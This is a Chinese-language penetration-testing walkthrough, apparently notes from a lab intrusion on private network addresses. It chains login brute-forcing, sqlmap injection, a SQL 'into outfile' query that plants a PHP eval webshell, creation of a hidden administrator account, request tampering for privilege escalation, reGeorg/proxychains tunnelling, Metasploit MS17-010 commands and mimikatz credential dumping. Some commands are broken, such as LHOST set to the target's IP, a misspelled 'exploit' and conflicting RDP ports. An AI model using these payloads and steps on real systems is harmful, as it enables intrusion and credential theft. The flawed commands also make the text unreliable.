1暴力破解
进入网站发现有登陆,开启代理,启动burp进行暴力破解
成功破解获密码为admin23
2sql注入
在如下注释出发现sql注入
使用sql map成功跑出网站后台账户与密码
使用somd5破解密码为mysql123
3获取shell
访问域名192.168.31.196可得到探针,从中得到当前网站目录
在使用获得的后台账号进入后,在数据维护中可执行sql语句,我们执行上传一句话语句select "<?php eval($_POST[‘pass’]);?>" into outfile "C:/UPUPW_AP5.2/htdocs/235.php"
接着访问一下出现空白页面成功
使用菜刀连接成功
4远程连接
先将一个大马上传
在大马中利用命令创建一个超级管理员
访问3386端口登陆自己创建的账号,成功连接
5垂直越权创建后台超级管理员
在修改密码添加管理员处,开启抓包
将原先的submanage改为manage权限
将包放掉后发现可以添加,进行添加并再次抓包进行提权
将包放掉后,发现提示操作成功
再用添加的账号进行登陆,成功添加为超级管理员
6代理隧道
在kali中reGeorg开启隧道
在kali使用工具 proxychains输入# vi /etc/proxychains.conf执行以上命令后,打开文件,将proxychains.conf文件中的dynamic_chain前面的注释符取消,添加代理服务器到列表(proxychains.conf文件末尾)socks5 127.0.0.1 9986.
通过用户想要使用的应用程序运行ProxyChains启动firefox执行命令如下所示:root@kali:~# proxychains firefox
成功访问内网ip
7内网渗透
通过大马执行命令arp-a发现内网的两台服务器ip为192.168.238.129和192.168.238.130
用nmap -vvv -n -sT -PN [ip]命令扫描这两个ip
代理msf,使msf可以使用
利用ms17_010的漏洞
设置好利用ms17_010所需要的参数
use exploit/windows/smb/ms17_010_psexec #切换到ms17漏洞模块
set RHOST 192.168.238.129 #设置目标机ip
set LHOST 192.168.238.129 #设置本机ip
exlioit #开始连接
成功了msf5就会变成meterpreter,显然这里是成功了的
利用脚本获取服务器用户及哈希(红框标注)
哈希解密可得到密码为admin123
另一个用猕猴桃得到明文密码
- 使用命令开启目标主机的3389端口
- 使用代理打开rdesktop,尝试连接内网目标主机